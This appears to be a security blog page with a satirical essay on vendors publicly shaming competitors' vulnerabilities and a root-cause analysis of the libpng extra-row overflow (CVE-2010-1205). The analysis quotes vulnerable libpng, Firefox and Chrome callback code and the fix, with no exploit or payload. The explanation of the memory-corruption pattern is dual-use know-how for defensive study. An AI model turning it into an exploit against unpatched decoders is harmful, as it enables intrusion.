Reduce your exposure to threats on the Web. Industry-leading security and features such as Web Threat Protection and a security bar, ensure your safety.

To me each of them is being _very_ conservative when it comes to describing how secure their product is. Each of those companies has extremely intelligent people from the security field working for them, about whom each company could boast. They could also talk about how few bugs have been found in their product, or their awesome fuzzing-farm that should dramatically reduce the number of 0days available for researchers to find. Or, if they wanted to get really crazy, they could even publicly bash their competitors, saying things like "Browser A sucks! BB security vulnerabilities were found in it in the past CC months! Only DD vulns were found in ours!"

What if companies actually _did_ focus on publicly bashing their competitors? The end goal for a company making a product is to increase their user-base and hence their profits, right? If they could make their competitor's product look like swiss cheese because of the number of security holes in it, they might very effectively keep existing users from switching to a competitor. They could also try to "prove" how little their product resembles swiss cheese, drawing in more users.

So far, this all doesn't seem too far-fetched. Often, I think of competing companies as being relatively nice towards each other when they find security vulnerabilities in the competitor's product. The vuln might get reported responsibly and then isn't really mentioned once it's fixed. But this is all different in what-if land. Imagine a world where they weren't publicly "nice" to each other. In this world, each company's security team would have two main job functions: fix our product, and find security holes in the competition so we can publicly humiliate them!

If this were the case, everything would be nuts and highly entertaining! Security marketing for a product would be more along the lines of "Don't use product EE! Our security team alone has recently found FF vulnerabilities in their product, we have only had [some # smaller than FF]!" or "Our security team finds more bugs in our competitor's products than they can manage to find and fix on their own! Imagine how secure our product is with such a team securing it!" or even more crass "Product GG has been found to be vulnerable to HH! We're not, use us! If you use them, we'll pwn you with the 0days we've been saving!" Once a company released a statement publicly bashing a competitor, the competitor would be forced to defend themselves in some form or another in order to keep their existing user-base. They might counter-attack, releasing advisories and embarrassing the attacker, or they might show how security feature MM effectively thwarts those attack vectors. If a company has no comeback, their user-base will dwindle until they can save face before their users.

Mainstream media would, of course, have a heyday with any and all public bashing. News stories with headlines such as "Company II publicly humiliates Company JJ! JJ declares war on II!" would abound, increasing the drama and upping the ante and humiliation.

But who would all of this actually benefit? Well, that should be fairly obvious, actually: the end-user! (Hey, isn't that what all this security stuff is about anyways?!) With all of the public bashing, humiliating, security dream-team putting-togethering going on, the actual products themselves will become more secure, either directly or indirectly. The rate at which bugs are found and fixed in a product would be amplified tremendously. New security features would constantly be thought up to stave off attacks and to undermine the competitor's claims. New policies would be put into place in companies to _quickly_ provide fixes for the end-user. Companies would scour the globe looking for the best in the security field to help them defend their product and attack the competitors. In the end, by the time the product reaches the end-user, it would be more secure. The end-user would also have a good time sitting back and enjoying the drama! Heck, companies could even sell tickets! We could make a sporting event out of it!

However, this wouldn't only help the end-user: it would help security researchers tremendously. As a result of the need for sufficiently good bash-ammunition and defensive armor a company will need against its competitors in order to stay alive, large companies that currently do not pay for vulnerabilities would be forced to pay. Not only would they be forced to pay, they would have to compete for security researcher's attention by constantly increasing the incentive. It's a win-win situation!

Of course there are some pitfalls in this thinking that I haven't mentioned, such as a large company picking on a small start-up who doesn't yet have the means to compete or defend themselves, or companies targeting specific individuals in the competition instead of the company they work for. In such a case, referees would have to be appointed who could rebuke the offending, rule-breaking company and publicly shame them for being a bully. The larger company then might have to help the smaller company out with it's security team and policies until it's able to defend itself. If an individual was personally harassed, the company should have to publicly apologize and send him a fruit-basket and a "Get-Well" card.

Crazy idea, huh? There are several other points I thought about bringing up, but I think I demonstrated what I wanted to. Would this really work? Probably not. It'd be crazy if it did though. Am I serious about this post? Partly (remember, this was only a thought-exercise!)

Even though this is an extreme example, the point I really wanted to make with this post is how different things might be for the end-user if companies personally had more at stake for creating (and selling) insecure products. My conclusion is that things could be very different from how they are today. Companies would have bigger/better security teams, different bug-fixing policies requiring fast turn around times for patch development, and the incentive for reporting vulnerabilities directly to the vendor would be at least better than the possibility of having your name in the acknowledgment section of an advisory. I think it might be a good thing.

PS - On a side note, in case you needed more food for thought: Does the problem of finding and fixing every security vulnerability in a product belong in P, NP, or is it NP complete?

Wednesday, July 21, 2010

libpng extra row (CVE-2010-1205)

This bug is a fairly straightforward one. I am interested in it for two main reasons. The first, and smaller reason, is that it's an interesting bug in that two parties are at fault if an application is vulnerable: the makers of the application and libpng itself. Each had to do something wrong in order for this to be an actual problem. The second, larger reason why I am so interested in this bug is because I had fuzzed into this bug back in April and sat on it too long. What happened next? Lo and behold, I wasn't the only one looking at pngs -- someone else reported it (first public reference: Google Chrome Issue, see also the alert on the libpng home page, and most recently, a Mozilla Security Advisory). Props to the guy who reported it (Aki Helin). With that in mind, here's a brief description of the vuln: an extra row in the image data is bad [*sarcasm*].

Actually, it's slightly more complicated than that. Libpng uses callbacks to aid with progressive reading of a png. That way, as the image rows become available, the application can handle them. The root problem lies in the fact that libpng versions prior to the fix would call the row_callback() function in the application for _every_ row without checking to see if more rows had been processed than the declared height in the IHDR chunk (which is what memory allocations are [usually] based on). Since libpng didn't check the number of rows processed (or the number of times the row_callback() was called), the last place to catch this bug would be in the application. If the application checked how many times its callback had been called against the height of the png stored in the png_ptr, it could bail when too many rows were received. But, libpng has been around for quite a while (15+ years), so everyone trusts it and never does their own checks, merely copying the inflated image rows into their own buffers, using a calculation based on their base buffer address, image width, row number, and the number of bytes per pixel.

Below is a snippet of Firefox's row_callback function. The statement that copies the image row data to the application's buffer is on line 822:
// Firefox 3.6.3
// modules/libpr0n/decoders/png/nsPNGDecoder.cpp  <-- who named this module??

725 void
726 row_callback(png_structp png_ptr, png_bytep new_row,
727              png_uint_32 row_num, int pass)
728 {
...
762   if (new_row) {
...
791     switch (decoder->format) {
...
819       case gfxASurface::ImageFormatARGB32:
820       {
821         for (PRUint32 x=width; x>0; --x) {
822           *cptr32++ = GFX_PACKED_PIXEL(line[3], line[0], line[1], line[2]);
823           if (line[3] != 0xff)
824             rowHasNoAlpha = PR_FALSE;
825           line += 4;
826         }
827       }
828       break;
...
833     }
...
851   }
852 }
Below is a snippet of Google Chrome's row_callback. The destination address in the code below is calculated on line 356, and the statement that copies the image row data to the destination is on line 360:
// Google Chrome, r44471
// gfx/codec/png_codec.cc

338 void DecodeRowCallback(png_struct* png_ptr, png_byte* new_row,
339                        png_uint_32 row_num, int pass) {
340   PngDecoderState* state = static_cast(
341       png_get_progressive_ptr(png_ptr));
342 
343   DCHECK(pass == 0) << "We didn't turn on interlace handling, but libpng is "
344                        "giving us interlaced data.";
345   if (static_cast(row_num) > state->height) {
346     NOTREACHED() << "Invalid row";
347     return;
348   }
349 
350   unsigned char* base = NULL;
351   if (state->bitmap)
352     base = reinterpret_cast(state->bitmap->getAddr32(0, 0));
353   else if (state->output)
354     base = &state->output->front();
355 
356   unsigned char* dest = &base[state->width * state->output_channels * row_num];
357   if (state->row_converter)
358     state->row_converter(new_row, state->width, dest, &state->is_opaque);
359   else
360     memcpy(dest, new_row, state->width * state->output_channels);
361 }
Well, enough of the rant-ish speaking. Below is how the libpng code worked before the fix:

First, the function png_process_data() is called by the application:
  // pngpread.c

  30 void PNGAPI
  31 png_process_data(png_structp png_ptr, png_infop info_ptr,
  32    png_bytep buffer, png_size_t buffer_size)
  33 {
  34    if (png_ptr == NULL || info_ptr == NULL)
  35       return;
  36 
  37    png_push_restore_buffer(png_ptr, buffer, buffer_size);
  38 
  39    while (png_ptr->buffer_size)
  40    {
  41       png_process_some_data(png_ptr, info_ptr);
  42    }
  43 }
This ends up calling png_process_some_data(), which iterates through and processes each chunk. Once the IDAT chunk (the chunk where the image data [and extra row] are stored) has been read and handled (via line 62), it is then in the PNG_READ_IDAT_MODE. At this point, it then drops down into the case at line 68, calling png_push_read_IDAT():
  // pngpread.c

  45 /* What we do with the incoming data depends on what we were previously
  46  * doing before we ran out of data...
  47  */
  48 void /* PRIVATE */
  49 png_process_some_data(png_structp png_ptr, png_infop info_ptr)
  50 {
  51    if (png_ptr == NULL)
  52       return;
  53 
  54    switch (png_ptr->process_mode)
  55    {
  ...
  62       case PNG_READ_CHUNK_MODE:
  63       {
  64          png_push_read_chunk(png_ptr, info_ptr);
  65          break;
  66       }
  67 
  68       case PNG_READ_IDAT_MODE:
  69       {
  70          png_push_read_IDAT(png_ptr);
  71          break;
  72       }
  ...
 109    }
 110 }
The png_push_read_IDAT() function is a bit longer, so I'm only going to show one relevant part:
 // pngpread.c

 735 void /* PRIVATE */
 736 png_push_read_IDAT(png_structp png_ptr)
 737 {
 738    PNG_IDAT;
 ...
 765    if (png_ptr->idat_size && png_ptr->save_buffer_size)
 766    {
 767       png_size_t save_size;
 768 
 769       if (png_ptr->idat_size < (png_uint_32)png_ptr->save_buffer_size)
 770       {
 771          save_size = (png_size_t)png_ptr->idat_size;
 772 
 773          /* Check for overflow */
 774          if ((png_uint_32)save_size != png_ptr->idat_size)
 775             png_error(png_ptr, "save_size overflowed in pngpread");
 776       }
 777       else
 778          save_size = png_ptr->save_buffer_size;
 779 
 780       png_calculate_crc(png_ptr, png_ptr->save_buffer_ptr, save_size);
 781 
 782       if (!(png_ptr->flags & PNG_FLAG_ZLIB_FINISHED))
 783          png_process_IDAT_data(png_ptr, png_ptr->save_buffer_ptr, save_size);
 784 
 785       png_ptr->idat_size -= save_size;
 786       png_ptr->buffer_size -= save_size;
 787       png_ptr->save_buffer_size -= save_size;
 788       png_ptr->save_buffer_ptr += save_size;
 789    }
 ...
 826 }
Basically, this function gets called multiple times, going down a different code path depending on what state the png_ptr->mode is in. One of the code paths makes a call to png_process_IDAT_data(), which inflates the compressed image data and begins the row processing. Notice how libpng never checks to see if the number of rows processed is greater than the declared height in the IHDR chunk:
 // pngpread.c

 828 void /* PRIVATE */
 829 png_process_IDAT_data(png_structp png_ptr, png_bytep buffer,
 830    png_size_t buffer_length)
 831 {
 832    int ret;
 833 
 834    if ((png_ptr->flags & PNG_FLAG_ZLIB_FINISHED) && buffer_length)
 835       png_benign_error(png_ptr, "Extra compression data");
 836 
 837    png_ptr->zstream.next_in = buffer;
 838    png_ptr->zstream.avail_in = (uInt)buffer_length;
 839    for (;;)
 840    {
 841       ret = inflate(&png_ptr->zstream, Z_PARTIAL_FLUSH);
 842       if (ret != Z_OK)
 843       {
 844          if (ret == Z_STREAM_END)
 845          {
 846             if (png_ptr->zstream.avail_in)
 847                png_benign_error(png_ptr, "Extra compressed data");
 848 
 849             if (!(png_ptr->zstream.avail_out))
 850             {
 851                png_push_process_row(png_ptr);
 852             }
 853 
 854             png_ptr->mode |= PNG_AFTER_IDAT;
 855             png_ptr->flags |= PNG_FLAG_ZLIB_FINISHED;
 856             break;
 857          }
 858          else if (ret == Z_BUF_ERROR)
 859             break;
 860 
 861          else
 862             png_error(png_ptr, "Decompression Error");
 863       }
 864       if (!(png_ptr->zstream.avail_out))
 865       {
 866          if ((
 867 #ifdef PNG_READ_INTERLACING_SUPPORTED
 868              png_ptr->interlaced && png_ptr->pass > 6) ||
 869              (!png_ptr->interlaced &&
 870 #endif
 871              png_ptr->row_number == png_ptr->num_rows))
 872          {
 873            if (png_ptr->zstream.avail_in)
 874              png_warning(png_ptr, "Too much data in IDAT chunks");
 875            png_ptr->flags |= PNG_FLAG_ZLIB_FINISHED;
 876            break;
 877          }
 878          png_push_process_row(png_ptr);
 879          png_ptr->zstream.avail_out =
 880              (uInt) PNG_ROWBYTES(png_ptr->pixel_depth,
 881              png_ptr->iwidth) + 1;
 882          png_ptr->zstream.next_out = png_ptr->row_buf;
 883       }
 884 
 885       else
 886          break;
 887    }
 888 }
As soon as a complete row is available, it calls the png_push_process_row() function (I'm leaving out the interlaced code for simplicity):
 // pngpread.c

 890 void /* PRIVATE */
 891 png_push_process_row(png_structp png_ptr)
 892 {
 893    png_ptr->row_info.color_type = png_ptr->color_type;
 894    png_ptr->row_info.width = png_ptr->iwidth;
 895    png_ptr->row_info.channels = png_ptr->channels;
 896    png_ptr->row_info.bit_depth = png_ptr->bit_depth;
 897    png_ptr->row_info.pixel_depth = png_ptr->pixel_depth;
 898 
 899    png_ptr->row_info.rowbytes = PNG_ROWBYTES(png_ptr->row_info.pixel_depth,
 900        png_ptr->row_info.width);
 901 
 902    png_read_filter_row(png_ptr, &(png_ptr->row_info),
 903       png_ptr->row_buf + 1, png_ptr->prev_row + 1,
 904       (int)(png_ptr->row_buf[0]));
 905 
 906    png_memcpy(png_ptr->prev_row, png_ptr->row_buf, png_ptr->rowbytes + 1);
 907 
 908    if (png_ptr->transformations || (png_ptr->flags&PNG_FLAG_STRIP_ALPHA))
 909       png_do_read_transformations(png_ptr);
 910 
 911 #ifdef PNG_READ_INTERLACING_SUPPORTED
 ...
1088 #endif
1089    {
1090       png_push_have_row(png_ptr, png_ptr->row_buf + 1);
1091       png_read_push_finish_row(png_ptr);
1092    }
1093 }

Notice the two calls on line 1090 and 1091. The first call, png_push_have_row(), calls the row_callback function defined in the application:
// pngpread.c

1682 void /* PRIVATE */
1683 png_push_have_row(png_structp png_ptr, png_bytep row)
1684 {
1685    if (png_ptr->row_fn != NULL)
1686       (*(png_ptr->row_fn))(png_ptr, row, png_ptr->row_number,
1687          (int)png_ptr->pass);
1688 }
The second call, png_read_push_finish_row(), merely increments png_ptr->row_number (it does more post-processing for interlaced images as well):
// pngpread.c

1095 void /* PRIVATE */
1096 png_read_push_finish_row(png_structp png_ptr)
1097 {
...
1117    png_ptr->row_number++;
...
1157 }
So what is the error? The number of actual rows in the image data is never checked against the rows declared in the IHDR chunk. When libpng fixed this bug, they rewrote most of the png_process_IDAT_data() function. The critical fix they added was this:
 // pngpread.c, libpng-1.4.3

 827 void /* PRIVATE */
 828 png_process_IDAT_data(png_structp png_ptr, png_bytep buffer,
 829    png_size_t buffer_length)
 830 {
 ...
 845    while (png_ptr->zstream.avail_in > 0 &&
 846       !(png_ptr->flags & PNG_FLAG_ZLIB_FINISHED))
 847    {
 ...
 891       /* Did inflate output any data? */
 892       if (png_ptr->zstream.next_out != png_ptr->row_buf)
 893       {
 894      /* Is this unexpected data after the last row?
 895       * If it is, artificially terminate the LZ output
 896       * here.
 897       */
 898          if (png_ptr->row_number >= png_ptr->num_rows ||
 899          png_ptr->pass > 6)
 900          {
 901         /* Extra data. */
 902         png_warning(png_ptr, "Extra compressed data in IDAT");
 903             png_ptr->flags |= PNG_FLAG_ZLIB_FINISHED;
 904         /* Do no more processing; skip the unprocessed
 905          * input check below.
 906          */
 907             return;
 908      }
 ...
 918    }
 ...
 926 }

Notice how it has the explicit check against the row number and the height of the image on line 898. Libpng now only calls the row_callback function at a maximum height times.

I think this is a prime example about trusting third-party code. Like a firearm safety instructor told me once about using the safety, "we use them, but we don't trust them". I think that is how third-party code should be used.